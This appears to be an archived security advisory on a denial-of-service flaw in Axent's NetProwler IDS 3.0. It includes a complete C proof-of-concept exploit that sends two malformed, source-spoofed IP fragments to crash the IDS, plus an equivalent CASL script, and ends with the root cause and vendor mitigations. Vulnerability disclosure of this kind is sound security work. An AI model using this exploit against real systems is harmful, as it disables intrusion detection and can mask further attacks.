COMMAND

    NetProwler

SYSTEMS AFFECTED

    NetProwler (Axent)

PROBLEM

    Rain Forest Puppy (RFP) found following.  The demonstration  below
    dribbles  two  fragmented  IP  packets  to  an IP address which is
    profiled  by  NetProwler  IDS  version  3.0.   The  result is that
    NetProwler  chokes,  dropping  into  a  lovely  Dr.  Watson  error
    message.  Note that this  was tested with an older  version (3.0),
    since Axent hasn't sent an  evaluation key for the latest  version
    downloadable from the web.  Also note that NetProwler needs to  be
    profiling the FTP service on the victim for this to be effective.

    This was found using Dug Song/Anzen's awesome Fragrouter program:

        http://www.anzen.com/research/nidsbench/

    Also, NetProwler stores incoming alert information in a Jet .mdb.

    PoC:

    /* 	RFProwl.c - rain forest puppy / wiretrip / rfp@wiretrip.net

	    Kills NetProwler IDS version 3.0

	    You need libnet installed.  It's available from
	    www.packetfactory.net.  Acks to route.

	    Only tested on RH 6.x Linux.  To compile:
	    gcc RFProwl.c -lnet -o RFProwl

	    Plus, make sure your architecture is defined below:   */

    #define LIBNET_LIL_ENDIAN 1
    #undef  LIBNET_BIG_ENDIAN 1

    #include <libnet.h>

    /* it's just much easier to code in the packet frags we want. :) */

    char pack1[]="\x45\x00"
    "\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09"
    "\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02"
    "\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    char pack2[]="\x45\x00"
    "\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09"
    "\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02"
    "\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00";

    int main(int argc, char **argv) {
        int sock, c;
        u_long src_ip, dst_ip;

        printf("RFProwl - rain forest puppy / wiretrip\n");

        if(argc<3){
          printf("Usage: RFProwl <profiled IP/destination> <src IP(fake)>\n");
          exit(EXIT_FAILURE);}

        dst_ip=inet_addr(argv[1]);
        src_ip=inet_addr(argv[2]);

        memcpy(pack1+16,&dst_ip,4);
        memcpy(pack2+16,&dst_ip,4);
        memcpy(pack1+12,&src_ip,4);
        memcpy(pack1+12,&src_ip,4);

        sock = open_raw_sock(IPPROTO_RAW);
        if (sock == -1){
          perror("Socket problems: ");
          exit(EXIT_FAILURE);}

        c = write_ip(sock, pack1, 46);
        if (c < 46) printf("Write_ip #1 choked\n");

        c = write_ip(sock, pack2, 46);
        if (c < 46) printf("Write_ip #2 choked\n");

        printf("Packets sent\n");

        return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);}

    There  is  a  CASL  Script  that reproduces the RFProwl.c exploit.
    This exploit sends two packets with wrong IP checksum:

    #include "tcpip.casl"
    #include "packets.casl"
    
    Src = pop args;
    Dst = pop args;
    
    
    Src = getip(Src);
    Dst = getip(Dst);
    
    
    iph = copy TCPIP;
    iph.ip_version = 4;
    iph.ip_headerlen = 5;
    iph.ip_tos = 0;
    iph.ip_length = 36;
    iph.ip_id  = 2233;
    iph.ip_offset = 3;
    iph.ip_ttl = 62;
    iph.ip_protocol = 6;
    iph.ip_cksum = 38648;
    iph.ip_source = Src;
    iph.ip_destination = Dst;
    
    tch = copy SYN;
    tch.tcp_source = 1026;
    tch.tcp_destination = 2058;
    tch.tcp_seqno = 2542901;
    tch.tcp_ackno = 0;
    tch.tcp_offset = 0;
    tch.tcp_x2 = 1;
    tch.tcp_syn = 1;
    tch.tcp_window = 768;
    
    pk1data = "\x 0\x 0\x 0\x 0\x 0\x 0";
    
    
    packet = [ iph, tch, pk1data ];
    
    ip_output(packet);
    
    iph2 = copy TCPIP;
    iph2.ip_version = 4;
    iph2.ip_headerlen = 5;
    iph2.ip_tos = 0;
    iph2.ip_length = 44;
    iph2.ip_id = 2239;
    iph2.ip_mf = 1;
    iph2.ip_ttl = 62;
    iph2.ip_protocol = 6;
    iph2.ip_cksum = 30445;
    iph2.ip_source = Src;
    iph2.ip_destination = Dst;
    
    tch2 = copy SYN;
    tch2.tcp_source = 1032;
    tch2.tcp_destination = 21;
    tch2.tcp_seqno = 2816737352;
    tch2.tcp_ackno = 0;
    tch2.tcp_x2 = 10;
    tch2.tcp_syn = 1;
    tch2.tcp_window = 32120;
    tch2.tcp_cksum = 29341;
    
    pk2data = "\x 2\x 4\x 5\xb4 \x 0\x 0";
    
    packet = [ iph2, tch2, pk2data ];
    
    ip_output(packet);

SOLUTION

    NetProwler  3.0  will  crash  if  the  Man-in-the-Middle signature
    encounters a packet for  which the following expression  evaluates
    to true:

        (IP_HEADER_LENGTH + TCP_HEADER_LENGTH) > IP_TOTAL_LENGTH

    This is not a packet fragmentation  problem.  It is an issue  with
    specific  malformed  packets.   This  problem  has  been  fixed in
    NetProwler 3.5, and the code  has been reviewed for other  similar
    issues.  Solutions:

        1. In NetProwler 3.0, disable the Man-in-the-Middle  signature
           for all monitored hosts.
        2. Upgrade to NetProwler 3.5 (to be released in June 2000).